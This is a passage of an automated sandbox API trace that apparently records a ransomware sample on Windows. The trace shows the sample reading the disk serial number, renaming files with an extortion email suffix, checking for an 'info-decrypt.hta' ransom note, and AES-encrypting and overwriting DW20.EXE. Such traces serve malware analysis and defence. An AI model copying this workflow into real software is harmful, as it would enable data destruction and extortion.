pdwValue=0x6d8e458) returned 0x80004002 [0149.176] WbemLocator:IUnknown:Release (This=0xb5ae6c) returned 0x3 [0149.176] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0149.176] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0149.176] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0149.176] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x601ffe4) returned 0x0 [0149.176] WbemLocator:IUnknown:AddRef (This=0x601ffe4) returned 0x4 [0149.176] WbemLocator:IUnknown:Release (This=0x601ffe4) returned 0x3 [0149.176] WbemLocator:IUnknown:Release (This=0x601ffe4) returned 0x2 [0149.176] SysStringLen (param_1=0x0) returned 0x0 [0149.176] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025610, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0149.176] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0149.176] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.176] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0149.176] WbemLocator:IUnknown:AddRef (This=0xb5ae84) returned 0x3 [0149.176] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ae84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5ae84) returned 0x0 [0149.176] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x3 [0149.176] WbemLocator:IUnknown:Release (This=0xb5ae84) returned 0x2 [0149.177] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed40*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed40*=0x20, pszText=0x0) returned 0x0 [0149.177] WbemDefPath:IWbemPath:GetText (in: This=0x6025610, lFlags=2, puBuffLength=0x6d8ed40*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed40*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0149.177] IWbemServices:GetObject (in: This=0x601ffe4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6d8ecf4*=0x0, ppCallResult=0x0 | out: ppObject=0x6d8ecf4*=0x6028180, ppCallResult=0x0) returned 0x0 [0149.924] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60255a0, puCount=0x6d8ecf4 | out: puCount=0x6d8ecf4*=0x2) returned 0x0 [0149.924] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=4, puBuffLength=0x6d8ecf0*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecf0*=0xf, pszText=0x0) returned 0x0 [0149.924] WbemDefPath:IWbemPath:GetText (in: This=0x60255a0, lFlags=4, puBuffLength=0x6d8ecf0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecf0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0149.925] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d7b84*=0, plFlavor=0x36d7b88*=0 | out: pVal=0x6d8ecf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d7b84*=8, plFlavor=0x36d7b88*=0) returned 0x0 [0149.925] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.925] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.925] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6d8ecf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36d7b84*=8, plFlavor=0x36d7b88*=0 | out: pVal=0x6d8ecf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36d7b84*=8, plFlavor=0x36d7b88*=0) returned 0x0 [0149.925] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.925] SysStringByteLen (bstr="9C354B42") returned 0x10 [0149.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpFilePart=0x0) returned 0x3d [0149.925] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6d8e8f8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x60 [0149.925] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed58) returned 1 [0149.925] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), fInfoLevelId=0x0, lpFileInformation=0x6d8edd4 | out: lpFileInformation=0x6d8edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x160c2ca0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0149.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed54) returned 1 [0149.926] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dbghelp.dll.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0149.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0149.930] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta", lpFilePart=0x0) returned 0x42 [0149.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed78) returned 1 [0149.930] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8edf4 | out: lpFileInformation=0x6d8edf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159ead60, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x159ead60, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x159ead60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0149.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed74) returned 1 [0149.931] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e918, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0149.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc4) returned 1 [0149.931] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), fInfoLevelId=0x0, lpFileInformation=0x36d8134 | out: lpFileInformation=0x36d8134*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88)) returned 1 [0149.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0149.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0149.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0149.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x428 [0149.932] GetFileType (hFile=0x428) returned 0x1 [0149.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0149.932] GetFileType (hFile=0x428) returned 0x1 [0149.932] GetFileSize (in: hFile=0x428, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0xf2b88 [0149.933] ReadFile (in: hFile=0x428, lpBuffer=0x4f65db0, nNumberOfBytesToRead=0xf2b88, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x4f65db0*, lpNumberOfBytesRead=0x6d8edac*=0xf2b88, lpOverlapped=0x0) returned 1 [0149.953] CloseHandle (hObject=0x428) returned 1 [0149.953] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xb1ebf8) returned 1 [0149.955] CryptGenRandom (in: hProv=0xb1ebf8, dwLen=0x10, pbBuffer=0x36d89c4 | out: pbBuffer=0x36d89c4) returned 1 [0150.869] CryptImportKey (in: hProv=0xb1ebf8, pbData=0x376727c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7fa10) returned 1 [0150.869] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.869] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.870] CryptDuplicateKey (in: hKey=0xb7fa10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f190) returned 1 [0150.870] CryptContextAddRef (hProv=0xb1ebf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.870] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x376735c*=0x1, dwFlags=0x0) returned 1 [0150.870] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x3767328, dwFlags=0x0) returned 1 [0150.877] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5058958*, pdwDataLen=0x6d8ed78*=0xf2b90, dwBufLen=0xf2b90 | out: pbData=0x5058958*, pdwDataLen=0x6d8ed78*=0xf2b90) returned 1 [0151.121] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3767384*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x3767384*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0151.123] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0151.123] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0151.123] CryptReleaseContext (hProv=0xb1ebf8, dwFlags=0x0) returned 1 [0151.123] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", lpFilePart=0x0) returned 0x3a [0151.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0151.123] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0151.123] GetFileType (hFile=0x31c) returned 0x1 [0151.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0151.123] GetFileType (hFile=0x31c) returned 0x1 [0151.124] WriteFile (in: hFile=0x31c, lpBuffer=0x376798c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x376798c*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0151.124] CloseHandle (hObject=0x31c) returned 1 [0151.125] CoTaskMemAlloc (cb=0x20c) returned 0xb82418 [0151.125] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xb82418 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0151.125] CoTaskMemFree (pv=0xb82418) [0151.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.125] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0151.125] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0151.125] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0151.125] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.126] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60249f0) returned 0x0 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x60249f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0151.127] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60249f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6025a00) returned 0x0 [0151.127] WbemDefPath:IUnknown:Release (This=0x60249f0) returned 0x0 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6025a00) returned 0x0 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0151.127] WbemDefPath:IUnknown:AddRef (This=0x6025a00) returned 0x3 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbdeec0) returned 0x0 [0151.127] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeec0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.127] WbemDefPath:IUnknown:Release (This=0xbdeec0) returned 0x3 [0151.127] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0151.127] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0151.127] WbemDefPath:IUnknown:Release (This=0x6025a00) returned 0x2 [0151.127] WbemDefPath:IUnknown:Release (This=0x6025a00) returned 0x1 [0151.127] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0151.127] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0151.127] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a00, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6025a00) returned 0x0 [0151.128] WbemDefPath:IUnknown:AddRef (This=0x6025a00) returned 0x3 [0151.128] WbemDefPath:IUnknown:Release (This=0x6025a00) returned 0x2 [0151.128] WbemDefPath:IWbemPath:SetText (This=0x6025a00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a00, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetText (in: This=0x6025a00, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025a00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a00, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025a00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025a00, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025a00, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0151.128] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.128] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0151.128] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0151.128] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0151.128] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.129] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6024a10) returned 0x0 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024a10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0151.129] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024a10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6025a70) returned 0x0 [0151.129] WbemDefPath:IUnknown:Release (This=0x6024a10) returned 0x0 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6025a70) returned 0x0 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0151.129] WbemDefPath:IUnknown:AddRef (This=0x6025a70) returned 0x3 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0151.129] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025a70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66cca08) returned 0x0 [0151.130] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 